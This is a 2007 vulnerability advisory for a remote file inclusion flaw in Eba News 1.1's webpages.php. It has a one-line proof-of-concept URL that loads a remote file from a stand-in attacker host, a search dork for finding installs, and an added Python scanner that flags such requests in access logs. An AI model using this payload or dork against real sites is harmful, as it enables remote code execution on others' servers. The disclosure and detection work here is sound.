ebanews-rfi.txt

2007-04-23T00:00:00
ID PACKETSTORM:56133
Type packetstorm
Reporter SekoMirza
Modified 2007-04-23T00:00:00

Description

                                        
--------------------------------------------------
Eba News Version : v1.1 <= (webpages.php) Remote File Include   
--------------------------------------------------  
  
Author : SekoMirza  
Date Found : April 11 2007  
Location : France // ...   
Critical Lvl : Highly critical  
Impact : System access  
Where : From Remote  
--------------------------------------------------  
  
Affected software description:  
~~~~~~~~~~~~~~~~~~~~~~~~~  
Application : Eba News  
version : 1.1  
vendor : http://ebascripts.com/  
source url : http://ebascripts.com/  
--------------------------------------------------  
  
Description:  
~~~~~~~~  
  
EBA-News is a powerful, open-source news management system written in PHP that uses MySQL as its backend. It provides a friendly user interface with great functionality. With automatic installation, you can have a professional-looking and secure news management system ready to use in mere minutes.  
  
  
  
--------------------------------------------------  
  
Vulnerability:  
~~~~~~~~~~~  
  
I found a vulnerable script in admin/public/webpages.php  
  
  
Proof Of Concept:  
~~~~~~~~~~~~  
  
eba/admin/public/webpages.php?filename=http://attact.com/colok.txt?  
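
Added example, not part of the original advisory: a Python check that scans web access logs for requests to webpages.php whose filename parameter carries a URL or stream wrapper, the pattern shown in the proof of concept above. The combined access-log format, the sample log lines and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Schemes/wrappers that should never appear in a local file-name parameter.
REMOTE_SCHEME = re.compile(r"^\s*(?:https?|ftps?|php|data|expect)\s*:", re.I)
# Request line inside a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def is_rfi_attempt(request_target, script="webpages.php", param="filename"):
    """True if `param` on `script` carries a URL or stream wrapper."""
    parts = urlsplit(request_target)
    if not parts.path.lower().endswith("/" + script):
        return False
    for value in parse_qs(parts.query, keep_blank_values=True).get(param, []):
        # parse_qs decodes once; decode again to catch double encoding.
        if REMOTE_SCHEME.match(value) or REMOTE_SCHEME.match(unquote(value)):
            return True
    return False

def scan(log_lines):
    """Return the log lines whose request matches the advisory's pattern."""
    hits = []
    for line in log_lines:
        m = REQUEST.search(line)
        if m and is_rfi_attempt(m.group(1)):
            hits.append(line)
    return hits

# Constructed sample log lines (documentation addresses, example.* hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Apr/2007:10:00:01 +0000] "GET /eba/admin/public/webpages.php?filename=about.html HTTP/1.1" 200 512',
    '192.0.2.44 - - [23/Apr/2007:10:00:07 +0000] "GET /eba/admin/public/webpages.php?filename=http://files.example.net/x.txt? HTTP/1.1" 200 90',
    '192.0.2.44 - - [23/Apr/2007:10:00:09 +0000] "GET /eba/admin/public/webpages.php?filename=hTTp%3A%2F%2Ffiles.example.net%2Fx.txt%3F HTTP/1.1" 200 90',
    '192.0.2.44 - - [23/Apr/2007:10:00:12 +0000] "GET /eba/admin/public/webpages.php?filename=%2568ttp%253A%252F%252Ffiles.example.net/x HTTP/1.1" 404 0',
    '192.0.2.77 - - [23/Apr/2007:10:01:00 +0000] "GET /eba/index.php?ref=http://www.example.org/ HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("possible RFI:", hit)
```

A hit with a 200 status and a small response body deserves a follow-up review of the host for files written after the request time.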
  
--------------------------------------------------  
  
google d0rk:  
~~~~~~~  
"Eba News"  
  
--------------------------------------------------  
Solution:  
~~~  
- Download the new version from the vendor URL   
  
--------------------------------------------------  
Shoutz:  
~~  
~ My Sweet -> Caramel   
~ For Mp3s -> Hypn0sis  
~ For Support -> www.starhack.org  
~ My Bro -> PhantomOrchid  
~ My Preceptor -> Earnk Kazno  
  
  
--------------------------------------------------  
  
Contact:  
~~~  
  
Seko[at]se-ko[dot]info  
  
-------------------------------- [ EOF ]----------  
  